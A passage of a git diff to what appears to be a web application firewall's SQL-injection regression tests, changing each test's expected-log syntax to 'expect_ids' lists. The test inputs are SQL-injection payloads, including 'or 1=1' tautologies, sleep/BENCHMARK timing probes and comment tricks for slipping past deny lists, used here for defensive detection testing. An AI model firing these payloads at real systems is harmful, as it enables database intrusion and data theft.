EXISTS" stages: @@ -722,4 +766,5 @@ tests: data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index b90d64dd2..503274696 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -17,4 +17,5 @@ tests: uri: "/get?var=sdfsd%27or%201%20%3e%201" version: HTTP/1.0 output: - log_contains: id "942390" + log: + expect_ids: [942390] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 31616f078..46b912d71 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -19,7 +19,8 @@ tests: data: "and '5'orig_var_datavarname=whatever" version: HTTP/1.0 output: - log_contains: id "942400" + log: + expect_ids: [942400] - test_id: 2 desc: "SQL Injection Attack - false positive" stages: @@ -36,4 +37,5 @@ tests: data: "and 7 oranges" version: HTTP/1.0 output: - no_log_contains: id "942400" + log: + no_expect_ids: [942400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 83030ad0a..8398d2f7c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -18,7 +18,8 @@ tests: data: "ABS(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -34,7 +35,8 @@ tests: data: "benchmark(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 3 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: data: "BENChmARk(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 4 desc: "SQL Injection Attack" stages: @@ -66,7 +69,8 @@ tests: data: "cast(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 5 desc: "SQL Injection Attack" stages: @@ -82,7 +86,8 @@ tests: data: "CAST(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 6 desc: "SQL Injection Attack" stages: @@ -98,7 +103,8 @@ tests: data: "char(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 7 desc: "SQL Injection Attack" stages: @@ -114,7 +120,8 @@ tests: data: "chaR(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 8 desc: "SQL Injection Attack" stages: @@ -130,7 +137,8 @@ tests: data: "chr(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 9 desc: "SQL Injection Attack" stages: @@ -146,7 +154,8 @@ tests: data: "CHR(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 10 desc: "SQL Injection Attack" stages: @@ -162,7 +171,8 @@ tests: data: "COALESCE(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 11 desc: "SQL Injection Attack" stages: @@ -178,7 +188,8 @@ tests: data: "Compress (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 12 desc: "SQL Injection Attack" stages: @@ -194,7 +205,8 @@ tests: data: "concat (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 13 desc: "SQL Injection Attack" stages: @@ -210,7 +222,8 @@ tests: data: "cOnCaT(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 14 desc: "SQL Injection Attack" stages: @@ -226,7 +239,8 @@ tests: data: "concat_ws(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 15 desc: "SQL Injection Attack" stages: @@ -242,7 +256,8 @@ tests: data: "convert(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 16 desc: "SQL Injection Attack" stages: @@ -258,7 +273,8 @@ tests: data: "cOnVeRt(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 17 desc: "SQL Injection Attack" stages: @@ -274,7 +290,8 @@ tests: data: "COS(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 18 desc: "SQL Injection Attack" stages: @@ -290,7 +307,8 @@ tests: data: "COUNT(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 19 desc: "SQL Injection Attack" stages: @@ -306,7 +324,8 @@ tests: data: "CURRENT_USER(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 20 desc: "SQL Injection Attack" stages: @@ -322,7 +341,8 @@ tests: data: "database (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 21 desc: "SQL Injection Attack" stages: @@ -338,7 +358,8 @@ tests: data: "date(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 22 desc: "SQL Injection Attack" stages: @@ -354,7 +375,8 @@ tests: data: "pay=date%5D%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 23 desc: "SQL Injection Attack" stages: @@ -370,7 +392,8 @@ tests: data: "pay=day.+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 24 desc: "SQL Injection Attack" stages: @@ -386,7 +409,8 @@ tests: data: "pay=day%26%27%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 25 desc: "SQL Injection Attack" stages: @@ -402,7 +426,8 @@ tests: data: "pay=decode%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 26 desc: "SQL Injection Attack" stages: @@ -418,7 +443,8 @@ tests: data: "pay=default%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 27 desc: "SQL Injection Attack" stages: @@ -434,7 +460,8 @@ tests: data: "pay=ELT%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 28 desc: "SQL Injection Attack" stages: @@ -450,7 +477,8 @@ tests: data: "pay=encode%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 29 desc: "SQL Injection Attack" stages: @@ -466,7 +494,8 @@ tests: data: "pay=ExtractValue%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 30 desc: "SQL Injection Attack" stages: @@ -482,7 +511,8 @@ tests: data: "pay=EXTRACTVALUE%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 31 desc: "SQL Injection Attack" stages: @@ -498,7 +528,8 @@ tests: data: "pay=floor%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 32 desc: "SQL Injection Attack" stages: @@ -514,7 +545,8 @@ tests: data: "pay=FLOOR+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 33 desc: "SQL Injection Attack" stages: @@ -530,7 +562,8 @@ tests: data: "pay=format%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 34 desc: "SQL Injection Attack" stages: @@ -546,7 +579,8 @@ tests: data: "pay=GROUP_CONCAT%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 35 desc: "SQL Injection Attack" stages: @@ -562,7 +596,8 @@ tests: data: "pay=hex%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 36 desc: "SQL Injection Attack" stages: @@ -578,7 +613,8 @@ tests: data: "pay=hEx%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 37 desc: "SQL Injection Attack" stages: @@ -594,7 +630,8 @@ tests: data: "pay=if+%21%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 38 desc: "SQL Injection Attack" stages: @@ -610,7 +647,8 @@ tests: data: "pay=if+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 39 desc: "SQL Injection Attack" stages: @@ -626,7 +664,8 @@ tests: data: "pay=if%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 40 desc: "SQL Injection Attack" stages: @@ -642,7 +681,8 @@ tests: data: "pay=if%5C%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 41 desc: "SQL Injection Attack" stages: @@ -658,7 +698,8 @@ tests: data: "pay=IFNULL%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 42 desc: "SQL Injection Attack" stages: @@ -674,7 +715,8 @@ tests: data: "pay=in+%27%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 43 desc: "SQL Injection Attack" stages: @@ -690,7 +732,8 @@ tests: data: "pay=IN+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 44 desc: "SQL Injection Attack" stages: @@ -706,7 +749,8 @@ tests: data: "pay=IN%2F%2A%2A%2F%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 45 desc: "SQL Injection Attack" stages: @@ -722,7 +766,8 @@ tests: data: "pay=insert%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 46 desc: "SQL Injection Attack" stages: @@ -738,7 +783,8 @@ tests: data: "pay=left%27%29%3F%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 47 desc: "SQL Injection Attack" stages: @@ -754,7 +800,8 @@ tests: data: "pay=LEFT%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 48 desc: "SQL Injection Attack" stages: @@ -770,7 +817,8 @@ tests: data: "pay=length%7C%7C%21%21%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 49 desc: "SQL Injection Attack" stages: @@ -786,7 +834,8 @@ tests: data: "pay=length%7C%7C%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 50 desc: "SQL Injection Attack" stages: @@ -802,7 +851,8 @@ tests: data: "pay=length%3F%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 51 desc: "SQL Injection Attack" stages: @@ -818,7 +868,8 @@ tests: data: "pay=length%26%26%21%21%21%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 52 desc: "SQL Injection Attack" stages: @@ -834,7 +885,8 @@ tests: data: "pay=length%26%26%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 53 desc: "SQL Injection Attack" stages: @@ -850,7 +902,8 @@ tests: data: "pay=LENGTH%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 54 desc: "SQL Injection Attack" stages: @@ -866,7 +919,8 @@ tests: data: "pay=ln+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 55 desc: "SQL Injection Attack" stages: @@ -882,7 +936,8 @@ tests: data: "pay=ln%29+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 56 desc: "SQL Injection Attack" stages: @@ -898,7 +953,8 @@ tests: data: "pay=load_file%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 57 desc: "SQL Injection Attack" stages: @@ -914,7 +970,8 @@ tests: data: "pay=local%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 58 desc: "SQL Injection Attack" stages: @@ -930,7 +987,8 @@ tests: data: "pay=log%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 59 desc: "SQL Injection Attack" stages: @@ -946,7 +1004,8 @@ tests: data: "pay=log%26%26%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 60 desc: "SQL Injection Attack" stages: @@ -962,7 +1021,8 @@ tests: data: "pay=lower%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 61 desc: "SQL Injection Attack" stages: @@ -978,7 +1038,8 @@ tests: data: "pay=MAKE_SET%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 62 desc: "SQL Injection Attack" stages: @@ -994,7 +1055,8 @@ tests: data: "pay=MAX%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 63 desc: "SQL Injection Attack" stages: @@ -1010,7 +1072,8 @@ tests: data: "pay=md5%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 64 desc: "SQL Injection Attack" stages: @@ -1026,7 +1089,8 @@ tests: data: "pay=md5%5C%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 65 desc: "SQL Injection Attack" stages: @@ -1042,7 +1106,8 @@ tests: data: "pay=MID%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 66 desc: "SQL Injection Attack" stages: @@ -1058,7 +1123,8 @@ tests: data: "pay=minute+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 67 desc: "SQL Injection Attack" stages: @@ -1074,7 +1140,8 @@ tests: data: "pay=month%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 68 desc: "SQL Injection Attack" stages: @@ -1090,7 +1157,8 @@ tests: data: "name_const(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 69 desc: "SQL Injection Attack" stages: @@ -1106,7 +1174,8 @@ tests: data: "now(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 70 desc: "SQL Injection Attack" stages: @@ -1122,7 +1191,8 @@ tests: data: "nOW(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 71 desc: "SQL Injection Attack" stages: @@ -1138,7 +1208,8 @@ tests: data: "ord(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 72 desc: "SQL Injection Attack" stages: @@ -1154,7 +1225,8 @@ tests: data: "password?(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 73 desc: "SQL Injection Attack" stages: @@ -1170,7 +1242,8 @@ tests: data: "password/?(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 74 desc: "SQL Injection Attack" stages: @@ -1186,7 +1259,8 @@ tests: data: "Password>$(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 75 desc: "SQL Injection Attack" stages: @@ -1202,7 +1276,8 @@ tests: data: "pg_sleep(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 76 desc: "SQL Injection Attack" stages: @@ -1218,7 +1293,8 @@ tests: data: "pi(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 77 desc: "SQL Injection Attack" stages: @@ -1234,7 +1310,8 @@ tests: data: "PI(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 78 desc: "SQL Injection Attack" stages: @@ -1250,7 +1327,8 @@ tests: data: "pow(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 79 desc: "SQL Injection Attack" stages: @@ -1266,7 +1344,8 @@ tests: data: "POW(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 80 desc: "SQL Injection Attack" stages: @@ -1282,7 +1361,8 @@ tests: data: "quarter. (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 81 desc: "SQL Injection Attack" stages: @@ -1298,7 +1378,8 @@ tests: data: "rand(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 82 desc: "SQL Injection Attack" stages: @@ -1314,7 +1395,8 @@ tests: data: "Rand (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 83 desc: "SQL Injection Attack" stages: @@ -1330,7 +1412,8 @@ tests: data: "RAND(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 84 desc: "SQL Injection Attack" stages: @@ -1346,7 +1429,8 @@ tests: data: "replace(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 85 desc: "SQL Injection Attack" stages: @@ -1362,7 +1446,8 @@ tests: data: "REPLACE(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 86 desc: "SQL Injection Attack" stages: @@ -1378,7 +1463,8 @@ tests: data: "round (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 87 desc: "SQL Injection Attack" stages: @@ -1394,7 +1480,8 @@ tests: data: "round(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 88 desc: "SQL Injection Attack" stages: @@ -1410,7 +1497,8 @@ tests: data: "rtrim(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 89 desc: "SQL Injection Attack" stages: @@ -1426,7 +1514,8 @@ tests: data: "RTRIM(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 90 desc: "SQL Injection Attack" stages: @@ -1442,7 +1531,8 @@ tests: data: "pay=sin (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 91 desc: "SQL Injection Attack" stages: @@ -1458,7 +1548,8 @@ tests: data: "SIN(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 92 desc: "SQL Injection Attack" stages: @@ -1474,7 +1565,8 @@ tests: data: "pay=sleep(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 93 desc: "SQL Injection Attack" stages: @@ -1490,7 +1582,8 @@ tests: data: "SLEEP (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 94 desc: "SQL Injection Attack" stages: @@ -1506,7 +1599,8 @@ tests: data: "pay=strcmp(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 95 desc: "SQL Injection Attack" stages: @@ -1522,7 +1616,8 @@ tests: data: "pay=substr(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 96 desc: "SQL Injection Attack" stages: @@ -1538,7 +1633,8 @@ tests: data: "SUBSTR(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 97 desc: "SQL Injection Attack" stages: @@ -1554,7 +1650,8 @@ tests: data: "pay=substring(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 98 desc: "SQL Injection Attack" stages: @@ -1570,7 +1667,8 @@ tests: data: "SUBSTRING(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 99 desc: "SQL Injection Attack" stages: @@ -1586,7 +1684,8 @@ tests: data: "pay=sysdate(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 100 desc: "SQL Injection Attack" stages: @@ -1602,7 +1701,8 @@ tests: data: "time (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 101 desc: "SQL Injection Attack" stages: @@ -1618,7 +1718,8 @@ tests: data: "pay=time%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 102 desc: "SQL Injection Attack" stages: @@ -1634,7 +1735,8 @@ tests: data: "pay=trim%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 103 desc: "SQL Injection Attack" stages: @@ -1650,7 +1752,8 @@ tests: data: "pay=Uncompress+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 104 desc: "SQL Injection Attack" stages: @@ -1666,7 +1769,8 @@ tests: data: "pay=unhex%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 105 desc: "SQL Injection Attack" stages: @@ -1682,7 +1786,8 @@ tests: data: "pay=uNhEx%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 106 desc: "SQL Injection Attack" stages: @@ -1698,7 +1803,8 @@ tests: data: "pay=updatexml%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 107 desc: "SQL Injection Attack" stages: @@ -1714,7 +1820,8 @@ tests: data: "pay=UpdateXML%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 108 desc: "SQL Injection Attack" stages: @@ -1730,7 +1837,8 @@ tests: data: "pay=UPPER%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 109 desc: "SQL Injection Attack" stages: @@ -1746,7 +1854,8 @@ tests: data: "pay=user+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 110 desc: "SQL Injection Attack" stages: @@ -1762,7 +1871,8 @@ tests: data: "pay=user%2F%3F%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 111 desc: "SQL Injection Attack" stages: @@ -1778,7 +1888,8 @@ tests: data: "pay=user%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 112 desc: "SQL Injection Attack" stages: @@ -1794,7 +1905,8 @@ tests: data: "pay=values+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 113 desc: "SQL Injection Attack" stages: @@ -1810,7 +1922,8 @@ tests: data: "pay=VALUES%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 114 desc: "SQL Injection Attack" stages: @@ -1826,7 +1939,8 @@ tests: data: "pay=version%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 115 desc: "SQL Injection Attack" stages: @@ -1842,7 +1956,8 @@ tests: data: "pay=version%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 116 desc: "SQL Injection Attack" stages: @@ -1858,7 +1973,8 @@ tests: data: "pay=xmltype%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 117 desc: "SQL Injection Attack" stages: @@ -1874,7 +1990,8 @@ tests: data: "pay=XMLType%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 118 desc: "SQL Injection Attack" stages: @@ -1890,4 +2007,5 @@ tests: data: "pay=year%5D%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index ef14db340..865399199 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -18,4 +18,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "942420" + log: + expect_ids: [942420] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index 7446ef615..22dc08ea6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -18,4 +18,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942421" + log: + expect_ids: [942421] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index 53bc53f74..c0dd5a946 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -18,4 +18,5 @@ tests: data: "var=(((((())))))&var2=whatever" version: HTTP/1.0 output: - log_contains: id "942430" + log: + expect_ids: [942430] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fcf159aed..fd9cea392 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -18,4 +18,5 @@ tests: data: "var=-------------------&var2=whatever" version: HTTP/1.0 output: - log_contains: id "942431" + log: + expect_ids: [942431] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index be29ba911..b43434dea 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -18,4 +18,5 @@ tests: data: "var=;;dd foo bar" version: HTTP/1.0 output: - log_contains: id "942432" + log: + expect_ids: [942432] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index ac44eecc4..7ce8e3c34 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=DROP%20sampletable%3b--" version: HTTP/1.0 output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 2 desc: "SQL Comment Sequence" stages: @@ -33,7 +34,8 @@ tests: uri: "/post" data: "test=' or 1=1;%00" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 3 desc: "SQL Comment Sequence" stages: @@ -49,7 +51,8 @@ tests: uri: "/post" data: "test=OR 1# " output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 4 desc: "SQL Comment Sequence" stages: @@ -65,7 +68,8 @@ tests: uri: "/post" data: "test=admin'--" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 5 desc: "SQL Comment Sequence" stages: @@ -81,7 +85,8 @@ tests: uri: "/post" data: "test=DROP/*comment*/sampletable" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 6 desc: "SQL Comment Sequence" stages: @@ -97,7 +102,8 @@ tests: uri: "/post" data: "test=DR/**/OP/*bypass deny listing*/sampletable" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 7 desc: "SQL Comment Sequence" stages: @@ -113,7 +119,8 @@ tests: uri: "/post" data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 8 desc: "SQL Comment Sequence" stages: @@ -129,7 +136,8 @@ tests: uri: "/post" data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 9 desc: "SQL Comment Sequence" stages: @@ -145,7 +153,8 @@ tests: uri: "/post" data: "test=' or 1=1# " output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 10 desc: "SQL Comment Sequence" stages: @@ -161,7 +170,8 @@ tests: uri: "/post" data: "test=‘ or 1=1-- -" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 11 desc: "SQL Comment Sequence" stages: @@ -177,7 +187,8 @@ tests: uri: "/post" data: "test=‘ or 1=1/*" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 12 desc: "SQL Comment Sequence" stages: @@ -193,7 +204,8 @@ tests: uri: "/post" data: "test=1='1' or-- -" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 13 desc: "SQL Comment Sequence" stages: @@ -209,7 +221,8 @@ tests: uri: "/post" data: "test=' /*!50000or*/1='1" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 14 desc: "SQL Comment Sequence" stages: @@ -225,7 +238,8 @@ tests: uri: "/post" data: "test=' /*!or*/1='1" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 15 desc: "SQL Comment 